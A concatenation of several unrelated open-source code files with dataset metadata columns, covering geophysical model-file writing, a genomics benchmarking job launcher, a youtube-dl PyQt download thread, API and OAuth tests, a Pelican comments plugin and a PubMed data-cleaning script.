(p2d.create_multiple_line_string(meshstep,
10,'%10.3f'))
# add resistivity map
rmap = ('%5i'%0*len(self.resistivity[0])+'\n')*self.n_airlayers
rmap += '\n'.join([''.join('%5i'%ii for ii in i) for i in \
np.arange(1,np.size(self.resistivity[:,:,0])+1).reshape(np.shape(self.resistivity)[:2])])
modelfilestring.append(rmap)
# add number of resistivity domains (+1 to include air)
modelfilestring.append('%5i'%(np.size(self.resistivity[:,:,0])+1))
# add dictionary contents, assuming rvertical = rmax, slant and dip zero
# first, air layer, properties always the same
modelfilestring.append(' 0 0 -1.00 0.00 0.00 0.00 0.00 0.00 0 0 0 0 0 0')
# second, dictionary contents
no = 1
for j in range(len(self.resistivity)):
for i in range(len(self.resistivity[j])):
# initialise a list containing resx,resy,strike
rlist = list(self.resistivity[j,i])
# insert resz (assumed to be same as resy)
rlist.insert(2,rlist[1])
# insert dip and slant (assumed zero)
rlist += [0.,0.]
# if rlist[1]/rlist[0] == 1.:
# aniso = ' 0'
# invert_key = ' 1 1 1 0 0 0'
# else:
aniso = ' 1'
invert_key = ' 1 1 1 1 1 0'
modelfilestring.append(''.join(['%5i'%no,aniso]+['%10.2f'%i for i in rlist]+[invert_key]))
no += 1
# append bathymetry index, at this stage only 0 allowed:
modelfilestring.append('%5i'%0)
# append number of calculation points (stations):
modelfilestring.append('%5i'%len(self.stationblocknums))
# append rotation
modelfilestring.append('%10.2f'%self.rotation)
# append station blocknums
modelfilestring.append(p2d.create_multiple_line_string(self.stationblocknums,
5,' %03i'))
modelfilestring.append('%5i'%0)
self.modelfilestring = '\n'.join(modelfilestring)+'\n'
def build_data(self):
imethod = 'nearest'
ftol = 0.000001
num_freq = int(self.parameters_data['max_no_frequencies'])
# get minimum and maximum periods
min_val = max([min(1./zo.freq) for zo in self.Data.Z])
max_val = min([max(1./zo.freq) for zo in self.Data.Z])
periodlst = []
for period in 1./self.Data.frequencies:
if len(periodlst) > 0:
# find the difference between the period and the closest period already in the list
closest_period_diff = np.amin(np.abs(np.array(periodlst)-period))
else:
# otherwise set period difference to a large number
closest_period_diff = 99999
# check whether the fractional difference is bigger than the tolerance set
# print closest_period_diff,closest_period_diff/period,
if closest_period_diff/period > ftol:
if min_val <= period <= max_val:
periodlst.append(period)
periodlst.sort()
# print periodlst
# if number of periods still too long based on the number of frequencies set
# then take out some frequencies
n = 2
new_periodlst = periodlst
while len(new_periodlst) > num_freq:
new_periodlst = [periodlst[int(p)] for p in range(len(periodlst)) if p%n == 0]
n += 1
periodlst = new_periodlst
mode = self.parameters_data['mode']
if type(mode) in [str]:
mode = mode.split(',')
self.parameters_data['mode'] = mode
datafile_data = {}
for ee,zo in enumerate(self.Data.Z):
to=self.Data.Tipper[ee]
datfn = str(self.stationblocknums[ee])+'_'+self.Data.stations[ee]+'.dat'
zerr = zo.zerr
z = zo.z
ze_rel = zerr/np.abs(z)
terr = to.tippererr
t = to.tipper
te_rel = terr/np.abs(t)
# set error floors
efz = self.parameters_data['errorfloor']['z']
eft = self.parameters_data['errorfloor']['tipper']
eftype = self.parameters_data['errorfloor_type']
if eftype in ['relative','offdiagonals']:
for i in range(2):
for j in range(2):
ze_rel[ze_rel<efz[i,j]] = efz[i,j]
te_rel[te_rel<eft[i]] = eft[i]
zerr = ze_rel * np.abs(z)
terr = te_rel * np.abs(t)
if eftype == 'offdiagonals':
for i in range(2):
for iz in range(len(z)):
if zerr[iz,i,i] < zerr[iz,i,1-i]:
zerr[iz,i,i] = zerr[iz,i,1-i]
zvar = zerr**2
# create interpolation functions to interpolate z and tipper values
properties = dict(z_real=np.real(z),z_imag=np.imag(z),
z_var=zvar,tipper_real=np.real(t),
tipper_imag=np.imag(t),tipper_err=terr)
properties_interp = {}
for key in properties.keys():
f = si.interp1d(np.log10(1./zo.freq),properties[key],
axis = 0,kind = imethod)
properties_interp[key] = f(np.log10(periodlst))
datafile_data[datfn] = properties_interp
self.datafile_data = datafile_data
self.freq = 1./(np.array(periodlst))
def build_datafiles(self):
if not hasattr(self,'datafile_data'):
self.build_data()
dfstrings = {}
for dfile in self.datafile_data.keys():
datfstr = '{:<3} '.format(len(self.freq))+\
' '.join([str(i) for i in self.parameters_data['mode']])+'\n'
for pv in range(len(self.freq)):
datlst = '{0:>12}'.format('%.06f'%(1./(self.freq[pv])))
for ii in range(2):
for jj in range(2):
for pval in ['z_real', 'z_imag', 'z_var']:
# print self.datafile_data[dfile][pval][pv][ii,jj]
datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][ii,jj])
for ii in range(2):
for pval in ['tipper_real', 'tipper_imag', 'tipper_err']:
datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][0,ii])
datfstr += ''.join(datlst)+'\n'
dfstrings[dfile] = datfstr
self.datafile_strings = dfstrings
def write_datafiles(self):
if not hasattr(self,'datafile_strings'):
self.build_datafiles()
exlf = open(os.path.join(self.working_directory,self.working_directory,self.exlfile),'w')
dfkeys=self.datafile_strings.keys()
dfkeys.sort()
for dfile in dfkeys:
f = open(op.join(self.working_directory,self.working_directory,dfile),'w')
f.write(self.datafile_strings[dfile])
f.close()
exlf.write(dfile+'\n')
exlf.close()
def write_ctlfile(self):
ctrf = open(op.join(self.working_directory,self.working_directory,'pb.ctr'),'w')
if type(self.parameters_data['mode']) == str:
self.parameters_data['mode'] = self.parameters_data['mode'].split(',')
ef = np.hstack([self.parameters_data['errorfloor'][l].flatten() for l in ['z','tipper']])
clist = []
clist.append(self.exlfile)
clist.append(self.parameters_ctl['ctl_string']+self.parameters_ctl['units_string']+self.parameters_ctl['quadrants'])
clist.append(' '.join([str(i) for i in self.parameters_data['mode']]))
clist.append(' '.join(['0.00' for i in ef]))
clist.append(self.parameters_ctl['orientation_string'])
clist.append(self.modelfile)
clist.append(self.resfile)
clist.append(self.parameters_ctl['convergence_string'])
clist.append(self.parameters_ctl['roughness_string'])
clist.append(self.parameters_ctl['anisotropy_penalty_string'])
clist.append(self.parameters_ctl['anisotropy_ctl_string'])
clist.append(self.cvgfile)
clist.append(self.outfile)
clist.append(self.pexfile)
clist.append(self.andfile)
self.controlfile_string = '\n'.join(clist)
ctrf.write(self.controlfile_string)
ctrf.close() | gpl-3.0 | 4,673,820,515,280,582,000 | 38.548638 | 125 | 0.513258 | false |
calico/basenji | bin/basenji_bench_gtex.py | 1 | 7886 | #!/usr/bin/env python
# Copyright 2020 Calico LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from optparse import OptionParser
import glob
import os
import pickle
import shutil
import subprocess
import sys
import h5py
import numpy as np
import slurm
"""
basenji_bench_gtex.py
Compute SNP expression difference scores for variants in VCF files of
fine-mapped GTEx variants to benchmark as features in a classification
task.
"""
################################################################################
# main
################################################################################
def main():
usage = 'usage: %prog [options] <params_file> <model_file>'
parser = OptionParser(usage)
# sad
parser.add_option('-f', dest='genome_fasta',
default='%s/data/hg38.fa' % os.environ['BASENJIDIR'],
help='Genome FASTA for sequences [Default: %default]')
parser.add_option('--local',dest='local',
default=1024, type='int',
help='Local SAD score [Default: %default]')
parser.add_option('-n', dest='norm_file',
default=None,
help='Normalize SAD scores')
parser.add_option('-o',dest='out_dir',
default='sad_gtex',
help='Output directory for tables and plots [Default: %default]')
parser.add_option('--pseudo', dest='log_pseudo',
default=1, type='float',
help='Log2 pseudocount [Default: %default]')
parser.add_option('--rc', dest='rc',
default=False, action='store_true',
help='Average forward and reverse complement predictions [Default: %default]')
parser.add_option('--shifts', dest='shifts',
default='0', type='str',
help='Ensemble prediction shifts [Default: %default]')
parser.add_option('--stats', dest='sad_stats',
default='SAD',
help='Comma-separated list of stats to save. [Default: %default]')
parser.add_option('-t', dest='targets_file',
default=None, type='str',
help='File specifying target indexes and labels in table format')
parser.add_option('--ti', dest='track_indexes',
default=None, type='str',
help='Comma-separated list of target indexes to output BigWig tracks')
parser.add_option('--threads', dest='threads',
default=False, action='store_true',
help='Run CPU math and output in a separate thread [Default: %default]')
parser.add_option('-u', dest='penultimate',
default=False, action='store_true',
help='Compute SED in the penultimate layer [Default: %default]')
# classify
parser.add_option('--msl', dest='msl',
default=1, type='int',
help='Random forest min_samples_leaf [Default: %default]')
# multi
parser.add_option('-e', dest='conda_env',
default='tf2.4',
help='Anaconda environment [Default: %default]')
parser.add_option('-g', dest='gtex_vcf_dir',
default='/home/drk/seqnn/data/gtex_fine/susie_pip90')
parser.add_option('--name', dest='name',
default='gtex', help='SLURM name prefix [Default: %default]')
parser.add_option('--max_proc', dest='max_proc',
default=None, type='int',
help='Maximum concurrent processes [Default: %default]')
parser.add_option('-p', dest='processes',
default=None, type='int',
help='Number of processes, passed by multi script. \
(Unused, but needs to appear as dummy.)')
parser.add_option('-q', dest='queue',
default='gtx1080ti',
help='SLURM queue on which to run the jobs [Default: %default]')
parser.add_option('-r', dest='restart',
default=False, action='store_true',
help='Restart a partially completed job [Default: %default]')
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error('Must provide parameters and model files')
else:
params_file = args[0]
model_file = args[1]
#######################################################
# prep work
# output directory
if not options.restart:
if os.path.isdir(options.out_dir):
print('Please remove %s' % options.out_dir, file=sys.stderr)
exit(1)
os.mkdir(options.out_dir)
# pickle options
options_pkl_file = '%s/options.pkl' % options.out_dir
options_pkl = open(options_pkl_file, 'wb')
pickle.dump(options, options_pkl)
options_pkl.close()
#######################################################
# predict
cmd_base = '. /home/drk/anaconda3/etc/profile.d/conda.sh;'
cmd_base += ' conda activate %s;' % options.conda_env
cmd_base += ' basenji_sad.py %s %s %s' % (options_pkl_file, params_file, model_file)
jobs = []
for gtex_pos_vcf in glob.glob('%s/*_pos.vcf' % options.gtex_vcf_dir):
# positive job
job_base = os.path.splitext(os.path.split(gtex_pos_vcf)[1])[0]
out_dir = '%s/%s' % (options.out_dir, job_base)
if not options.restart or not os.path.isfile('%s/sad.h5'%out_dir):
cmd = '%s -o %s %s' % (cmd_base, out_dir, gtex_pos_vcf)
name = '%s_%s' % (options.name, job_base)
j = slurm.Job(cmd, name,
'%s.out'%out_dir, '%s.err'%out_dir,
queue=options.queue, gpu=1,
mem=22000, time='1-0:0:0')
jobs.append(j)
# negative job
gtex_neg_vcf = gtex_pos_vcf.replace('_pos.','_neg.')
job_base = os.path.splitext(os.path.split(gtex_neg_vcf)[1])[0]
out_dir = '%s/%s' % (options.out_dir, job_base)
if not options.restart or not os.path.isfile('%s/sad.h5'%out_dir):
cmd = '%s -o %s %s' % (cmd_base, out_dir, gtex_neg_vcf)
name = '%s_%s' % (options.name, job_base)
j = slurm.Job(cmd, name,
'%s.out'%out_dir, '%s.err'%out_dir,
queue=options.queue, gpu=1,
mem=22000, time='1-0:0:0')
jobs.append(j)
slurm.multi_run(jobs, max_proc=options.max_proc, verbose=True,
launch_sleep=10, update_sleep=60)
#######################################################
# classify
cmd_base = 'basenji_bench_classify.py -i 100 -p 2 -r 44 -s'
cmd_base += ' --msl %d' % options.msl
jobs = []
for gtex_pos_vcf in glob.glob('%s/*_pos.vcf' % options.gtex_vcf_dir):
tissue = os.path.splitext(os.path.split(gtex_pos_vcf)[1])[0][:-4]
sad_pos = '%s/%s_pos/sad.h5' % (options.out_dir, tissue)
sad_neg = '%s/%s_neg/sad.h5' % (options.out_dir, tissue)
out_dir = '%s/%s_class' % (options.out_dir, tissue)
if not options.restart or not os.path.isfile('%s/stats.txt' % out_dir):
cmd = '%s -o %s %s %s' % (cmd_base, out_dir, sad_pos, sad_neg)
j = slurm.Job(cmd, tissue,
'%s.out'%out_dir, '%s.err'%out_dir,
queue='standard', cpu=2,
mem=22000, time='1-0:0:0')
jobs.append(j)
slurm.multi_run(jobs, verbose=True)
def job_completed(options, pi):
"""Check whether a specific job has generated its
output file."""
if options.out_txt:
out_file = '%s/job%d/sad_table.txt' % (options.out_dir, pi)
elif options.out_zarr:
out_file = '%s/job%d/sad.zarr' % (options.out_dir, pi)
elif options.csv:
out_file = '%s/job%d/sad_table.csv' % (options.out_dir, pi)
else:
out_file = '%s/job%d/sad.h5' % (options.out_dir, pi)
return os.path.isfile(out_file) or os.path.isdir(out_file)
################################################################################
# __main__
################################################################################
if __name__ == '__main__':
main()
| apache-2.0 | -2,270,618,590,698,872,600 | 36.023474 | 86 | 0.591301 | false |
yasoob/youtube-dl-GUI | Threads/Download.py | 1 | 6410 | import math
from pathlib import Path
import youtube_dl
from PyQt5 import QtCore
class StopError(Exception):
pass
class DownloadSignals(QtCore.QObject):
"Define the signals available from a running download thread"
status_bar_signal = QtCore.pyqtSignal(str)
remove_url_signal = QtCore.pyqtSignal(str)
add_update_list_signal = QtCore.pyqtSignal([list])
remove_row_signal = QtCore.pyqtSignal()
finished = QtCore.pyqtSignal()
class Download(QtCore.QRunnable):
"Download Thread"
def __init__(self, opts):
super(Download, self).__init__()
self.parent = opts.get("parent")
self.error_occurred = False
self.done = False
self.file_name = ""
self.speed = "-- KiB/s"
self.eta = "00:00"
self.bytes = self.format_bytes(None)
self.url = opts.get("url")
self.directory = opts.get("directory")
if self.directory:
self.directory = str(Path(opts.get("directory")).resolve())
self.local_rowcount = opts.get("rowcount")
self.convert_format = opts.get("convert_format")
self.proxy = opts.get("proxy")
self.keep_file = opts.get("keep_file")
# Signals
self.signals = DownloadSignals()
def hook(self, li):
if self.done:
raise StopError()
_file_name = li.get("filename")
if li.get("downloaded_bytes"):
if li.get("speed"):
self.speed = self.format_speed(li.get("speed"))
self.eta = self.format_seconds(li.get("eta"))
self.bytes = self.format_bytes(li.get("total_bytes", "unknown"))
filename = str(Path(_file_name).stem)
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
filename,
self.bytes,
self.eta,
self.speed,
li.get("status"),
]
)
elif li.get("status") == "finished":
self.file_name = str(Path(_file_name).stem)
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
self.file_name,
self.bytes,
self.eta,
self.speed,
"Converting",
]
)
else:
self.bytes = self.format_bytes(li.get("total_bytes"))
self.file_name = Path(_file_name).name
self.speed = "-- KiB/s"
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
self.file_name,
self.bytes,
"00:00",
self.speed,
"Finished",
]
)
self.signals.status_bar_signal.emit("Already Downloaded")
self.signals.remove_row_signal.emit()
def _prepare_ytd_options(self):
ydl_options = {
"outtmpl": f"{self.directory}/%(title)s-%(id)s.%(ext)s",
"continuedl": True,
"quiet": True,
"proxy": self.proxy,
}
if self.convert_format is not False:
ydl_options["postprocessors"] = [
{
"key": "FFmpegVideoConvertor",
"preferedformat": self.convert_format,
}
]
if self.keep_file:
ydl_options["keepvideo"] = True
return ydl_options
def download(self):
ydl_options = self._prepare_ytd_options()
with youtube_dl.YoutubeDL(ydl_options) as ydl:
ydl.add_default_info_extractors()
ydl.add_progress_hook(self.hook)
try:
ydl.download([self.url])
except (
youtube_dl.utils.DownloadError,
youtube_dl.utils.ContentTooShortError,
youtube_dl.utils.ExtractorError,
youtube_dl.utils.UnavailableVideoError,
) as e:
self.error_occurred = True
self.signals.remove_row_signal.emit()
self.signals.remove_url_signal.emit(self.url)
self.signals.status_bar_signal.emit(str(e))
except StopError:
# import threading
# print("Exiting thread:", threading.currentThread().getName())
self.done = True
self.signals.finished.emit()
@QtCore.pyqtSlot()
def run(self):
self.signals.add_update_list_signal.emit(
[self.local_rowcount, self.url, "", "", "", "Starting"]
)
self.download()
if self.error_occurred is not True:
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
self.file_name,
self.bytes,
"00:00",
self.speed,
"Finished",
]
)
self.signals.status_bar_signal.emit("Done!")
self.signals.remove_url_signal.emit(self.url)
self.done = True
self.signals.finished.emit()
def stop(self):
self.done = True
def format_seconds(self, seconds):
(minutes, secs) = divmod(seconds, 60)
(hours, minutes) = divmod(minutes, 60)
if hours > 99:
return "--:--:--"
if hours == 0:
return "%02d:%02d" % (minutes, secs)
else:
return "%02d:%02d:%02d" % (hours, minutes, secs)
# TODO: Move to utils
def format_bytes(self, _bytes=None):
if not _bytes:
return "N/A"
_bytes = float(_bytes)
if _bytes == 0.0:
exponent = 0
else:
exponent = int(math.log(_bytes, 1024.0))
suffix = ["B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB"][exponent]
converted = _bytes / float(1024 ** exponent)
return "%.2f%s" % (converted, suffix)
def format_speed(self, speed=None):
if not speed:
return "%10s" % "---b/s"
return "%10s" % ("%s/s" % self.format_bytes(speed))
| mit | 7,824,562,817,449,066,000 | 31.538071 | 88 | 0.487676 | false |
trickvi/pepperhash | scripts/hash_message.py | 1 | 1105 | # hash_message - submit a message to pepperhash for hash generation
# Copyright (C) 2015 Tryggvi Bjorgvinsson
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import getpass
import urlparse
import urllib
# Grab the stuff we need like host and message we'll be sending
host = raw_input("Cryptkeeper host: ")
msg = getpass.getpass("Message: ")
# Post the message to the service and print the response
response = urllib.urlopen(
host, urllib.urlencode({'message':msg}))
print response.read()
| agpl-3.0 | -2,033,055,807,987,605,200 | 37.103448 | 77 | 0.761991 | false |
AASHE/python-membersuite-api-client | membersuite_api_client/tests/test_security.py | 1 | 5431 | import os
import unittest
from ..exceptions import LoginToPortalError, MemberSuiteAPIError
from ..security import models
from ..security.services import login_to_portal, logout
from ..utils import get_new_client
LOGIN_TO_PORTAL_RETRIES = 5
LOGIN_TO_PORTAL_DELAY = 1
MEMBER_ID = os.environ['TEST_MS_MEMBER_PORTAL_USER_ID']
MEMBER_PASSWORD = os.environ['TEST_MS_MEMBER_PORTAL_USER_PASSWORD']
NONMEMBER_ID = os.environ['TEST_MS_NON_MEMBER_PORTAL_USER_ID']
NONMEMBER_PASSWORD = os.environ['TEST_MS_NON_MEMBER_PORTAL_USER_PASSWORD']
MEMBER_ORG_NAME = os.environ['TEST_MS_MEMBER_ORG_NAME']
def _login(client, member=True):
if client.session_id is None:
client.request_session()
if member:
return login_to_portal(
username=MEMBER_ID,
password=MEMBER_PASSWORD,
client=client,
retries=LOGIN_TO_PORTAL_RETRIES,
delay=LOGIN_TO_PORTAL_DELAY)
else:
return login_to_portal(
username=NONMEMBER_ID,
password=NONMEMBER_PASSWORD,
client=client,
retries=LOGIN_TO_PORTAL_RETRIES,
delay=LOGIN_TO_PORTAL_DELAY)
class SecurityServicesTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = get_new_client()
def test_login_to_portal(self):
"""Can we log in to the portal?"""
portal_user = _login(client=self.client)
self.assertIsInstance(portal_user, models.PortalUser)
def test_login_to_portal_failure(self):
"""What happens when we can't log in to the portal?"""
with self.assertRaises(LoginToPortalError):
login_to_portal(username="bo-o-o-gus user ID",
password="wrong password",
client=self.client,
retries=LOGIN_TO_PORTAL_RETRIES,
delay=LOGIN_TO_PORTAL_DELAY)
def test_logout(self):
"""Can we logout?
This logs out from the API client session, not the MemberSuite
Portal.
"""
self.client.session_id = None
self.client.request_session() # A fresh session. Yum!
self.assertTrue(self.client.session_id)
logout(self.client)
self.assertIsNone(self.client.session_id)
class PortalUserTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = get_new_client()
def setUp(self):
self.portal_user = _login(client=self.client)
def test_generate_username(self):
"""Does generate_username() work?
"""
self.portal_user.membersuite_id = "6faf90e4-fake-membersuite-id"
self.assertEqual("ms-fake-membersuite-id",
models.generate_username())
def test_get_individual(self):
"""Does get_individual() work?
"""
individual = self.portal_user.get_individual(client=self.client)
self.assertEqual(self.portal_user.first_name, individual.first_name)
self.assertEqual(self.portal_user.last_name, individual.last_name)
self.assertEqual(self.portal_user.owner, individual.membersuite_id)
class IndividualTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = get_new_client()
def setUp(self):
self.client.request_session()
member_portal_user = _login(client=self.client)
self.individual_member = member_portal_user.get_individual(
client=self.client)
def test_is_member_for_member(self):
"""Does is_member() work for members?
"""
is_member = self.individual_member.is_member(client=self.client)
self.assertTrue(is_member)
# test_is_member_for_nonmember() below can't succeed, because it
# doesn't know about any non-member to use. Once non-member data
# (at least a non-member Organization and a connected Individudal
# with Portal Access) is available, push it into the env in
# TEST_NON_MEMBER_MS_PORTAL_USER_ID and
# TEST_NON_MEMBER_MS_PORTAL_USER_PASS and unskip this test.
@unittest.skip("Because it can't succeed")
def test_is_member_for_nonmember(self):
"""Does is_member() work for non-members?
"""
client = get_new_client()
client.request_session()
non_member_portal_user = _login(client=client,
member=False)
individual_non_member = non_member_portal_user.get_individual(
client=client)
is_member = individual_non_member.is_member(client=client)
self.assertFalse(is_member)
def test_get_primary_organization(self):
"""Does get_primary_organization() work?
Assumptions:
- self.individual_member has as its primary organization, one
named MEMBER_ORG_NAME
"""
organization = self.individual_member.get_primary_organization(
client=self.client)
self.assertEqual(MEMBER_ORG_NAME, organization.name)
def test_get_primary_organization_fails(self):
"""What happens when get_primary_organization() fails?
"""
with self.assertRaises(MemberSuiteAPIError):
self.individual_member.primary_organization__rtg = "bogus ID"
self.individual_member.get_primary_organization(
client=self.client)
if __name__ == '__main__':
unittest.main()
| mit | -2,669,964,762,304,449,500 | 31.327381 | 76 | 0.63561 | false |
AcrDijon/henet | pelican/plugins/henet_comments.py | 1 | 1027 | # -*- coding: utf-8 -*-
import traceback
from pelican import signals
from henet.comments import ArticleThread
from henet.rst.rst2html import rst2html
# xxx read config
storage_dir = '/Users/tarek/Dev/github.com/acr-dijon.org/comments/'
# xxx cache
def add_comments(generator, content):
try:
# the article unique id is its relative source path,
# so the comments are not dependant on the URL.
source_path = content.get_relative_source_path()
article_uuid = source_path.encode('utf8')
thread = ArticleThread(storage_dir, article_uuid)
thread = thread.asjson()
for comment in thread['comments']:
html = rst2html(comment['text'], theme='acr', body_only=True)
comment['html'] = html
content.metadata["comments"] = thread
except:
# XXX for some reason Pelican does not print plugins exceptions
traceback.print_exc()
raise
def register():
signals.article_generator_write_article.connect(add_comments)
| apache-2.0 | 475,495,567,925,430,500 | 28.342857 | 73 | 0.666991 | false |
stianpr/flask-oauthlib | tests/test_oauth2/test_code.py | 1 | 4530 | # coding: utf-8
from datetime import datetime, timedelta
from .base import TestCase
from .base import create_server, sqlalchemy_provider, cache_provider
from .base import db, Client, User, Grant
class TestDefaultProvider(TestCase):
def create_server(self):
create_server(self.app)
def prepare_data(self):
self.create_server()
oauth_client = Client(
name='ios', client_id='code-client', client_secret='code-secret',
_redirect_uris='http://localhost/authorized',
)
db.session.add(User(username='foo'))
db.session.add(oauth_client)
db.session.commit()
self.oauth_client = oauth_client
self.authorize_url = (
'/oauth/authorize?response_type=code&client_id=%s'
) % oauth_client.client_id
def test_get_authorize(self):
rv = self.client.get('/oauth/authorize')
assert 'client_id' in rv.location
rv = self.client.get('/oauth/authorize?client_id=no')
assert 'client_id' in rv.location
url = '/oauth/authorize?client_id=%s' % self.oauth_client.client_id
rv = self.client.get(url)
assert 'error' in rv.location
rv = self.client.get(self.authorize_url)
assert b'confirm' in rv.data
def test_post_authorize(self):
url = self.authorize_url + '&scope=foo'
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'invalid_scope' in rv.location
url = self.authorize_url + '&scope=email'
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'code' in rv.location
url = self.authorize_url + '&scope='
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'error=Scopes+must+be+set' in rv.location
def test_invalid_token(self):
rv = self.client.get('/oauth/token')
assert b'unsupported_grant_type' in rv.data
rv = self.client.get('/oauth/token?grant_type=authorization_code')
assert b'error' in rv.data
assert b'code' in rv.data
url = (
'/oauth/token?grant_type=authorization_code'
'&code=nothing&client_id=%s'
) % self.oauth_client.client_id
rv = self.client.get(url)
assert b'invalid_client' in rv.data
url += '&client_secret=' + self.oauth_client.client_secret
rv = self.client.get(url)
assert b'invalid_client' not in rv.data
assert rv.status_code == 401
def test_invalid_redirect_uri(self):
authorize_url = (
'/oauth/authorize?response_type=code&client_id=code-client'
'&redirect_uri=http://localhost:8000/authorized'
'&scope=invalid'
)
rv = self.client.get(authorize_url)
assert 'error=' in rv.location
assert 'Mismatching+redirect+URI' in rv.location
def test_get_token(self):
expires = datetime.utcnow() + timedelta(seconds=100)
grant = Grant(
user_id=1,
client_id=self.oauth_client.client_id,
scope='email',
redirect_uri='http://localhost/authorized',
code='test-get-token',
expires=expires,
)
db.session.add(grant)
db.session.commit()
url = (
'/oauth/token?grant_type=authorization_code'
'&code=test-get-token&client_id=%s'
) % self.oauth_client.client_id
rv = self.client.get(url)
assert b'invalid_client' in rv.data
url += '&client_secret=' + self.oauth_client.client_secret
rv = self.client.get(url)
assert b'access_token' in rv.data
class TestSQLAlchemyProvider(TestDefaultProvider):
def create_server(self):
create_server(self.app, sqlalchemy_provider(self.app))
class TestCacheProvider(TestDefaultProvider):
def create_server(self):
create_server(self.app, cache_provider(self.app))
def test_get_token(self):
url = self.authorize_url + '&scope=email'
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'code' in rv.location
code = rv.location.split('code=')[1]
url = (
'/oauth/token?grant_type=authorization_code'
'&code=%s&client_id=%s'
) % (code, self.oauth_client.client_id)
rv = self.client.get(url)
assert b'invalid_client' in rv.data
url += '&client_secret=' + self.oauth_client.client_secret
rv = self.client.get(url)
assert b'access_token' in rv.data
| bsd-3-clause | 1,346,164,920,111,912,200 | 32.308824 | 77 | 0.601104 | false |
TariqAHassan/ZeitSci | analysis/pubmed_postprocessing.py | 1 | 15935 | """
Clean the Pubmed Post Processing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dump obtained on: July 11, 2016 (double check).
Python 3.5
"""
import re
import os
import blaze
import numpy as np
import pandas as pd
from blaze import *
from copy import deepcopy
from collections import defaultdict
from collections import OrderedDict
from easymoney.easy_pandas import strlist_to_list
from easymoney.easy_pandas import twoD_nested_dict
from analysis.abstract_analysis import common_words
from tqdm import tqdm
# from odo import odo
# Goal:
# A dataframe with the following columns:
# Researcher
# Fields -- use journal ranking dataframe
# ResearcherSubfields -- use journal ranking dataframe
# ResearchAreas (sub-subfield) -- use journal ranking dataframe -- keywords
# Amount
# NormalizedAmount -- the grant in 2015 USD (2016 not handled properly...fix)
# Currency
# YearOfGrant
# FundingSource
# Collaborators X -- based on pubmed 2000-2016 download
# keywords
# Institution
# Endowment -- use wikipedia universties database
# InstitutionType -- use wikipedia universties database (i.e., public or private)
# InstitutionRanking V -- Ranking of the institution (uni). Impact Factor usage rights are prohibitive.
# InstutionCountry
# City/NearestCity
# lng
# lat
# V = VOID, i.e., not possible
# X = to do (when all country's data are assembled)
# Also: Run an abstract analysis on each keyword/term this will standardize the terms
# ------------------------------------------------------------------------- #
# General Tools & Information #
# ------------------------------------------------------------------------- #
MAIN_FOLDER = "/Users/tariq/Google Drive/Programming Projects/ZeitSci/"
# Move to AUX_NCBI_DATA Folder
os.chdir(MAIN_FOLDER + "/Data/NCBI_DATA")
pubmed = pd.io.parsers.read_csv("Pubmed2000_to_2015.csv", nrows=100000, encoding='utf-8')
# Clean..for now
pubmed['title'] = pubmed['title'].str.replace("[", "").str.replace("]", "")
tqdm.pandas(desc="status")
# ------------------------------------------------------------------------- #
# Integrate NCBI Metadata with Journal Ranking Information #
# ------------------------------------------------------------------------- #
os.chdir(MAIN_FOLDER + "/Data/WikiPull")
# Read in Journal Database
journal_db = pd.read_csv("wiki_journal_db.csv")
# Remove '.' from Journal_Abbrev
journal_db['Journal_Abbrev'] = journal_db['Journal_Abbrev'].map(lambda x: x if str(x) == 'nan' else x.replace(".", ""))
# Convert Field to list
journal_db['Field'] = journal_db['Field'].map(lambda x: x if str(x) == 'nan' else strlist_to_list(x))
# Convert Discipline to list.
# the first map converts "['item', 'item']" --> ['item', 'item']
# the second map replaces empty lists with nans
journal_db['Discipline'] = journal_db['Discipline'].map(
lambda x: x if str(x) == 'nan' else strlist_to_list(x)). \
map(lambda x: np.NaN if str(x) == 'nan' or len(x) == 1 and x[0] == '' else x)
# Merge Field and Discipline
field_and_discipline = journal_db.apply(lambda x: [x['Field'], x['Discipline']], axis=1)
# Dict with Journal's Full Name as the key
full_title_dict = dict(zip(journal_db['Title'].str.upper(), field_and_discipline))
# Dict with Journal's Abrev. as the key
abrev_title_dict = dict(zip(journal_db['Journal_Abbrev'].str.upper(), field_and_discipline))
# Remove NaN key
abrev_title_dict = {k: v for k, v in abrev_title_dict.items() if str(k) != 'nan'}
def journal_match(full_name, partial_name):
"""
Fuction to match joural to its field and discipline
using the full_title_dict and abrev_title_dict dictionaries.
:param full_name: the full name of the journal.
:type full_name: str
:param partial_name: the abrev. of the journal.
:type partial_name: str
:return: [FIELD, DISCIPLINE]
:rtype: ``nan`` or ``list``
"""
if partial_name.upper() in abrev_title_dict:
return abrev_title_dict[partial_name.upper()]
elif partial_name.upper() != full_name.upper() and full_name.upper() in full_title_dict:
return full_title_dict[full_name.upper()]
else:
return [np.NaN, np.NaN]
# Attempt to add field and discipline information using a journal's full name or abrev.
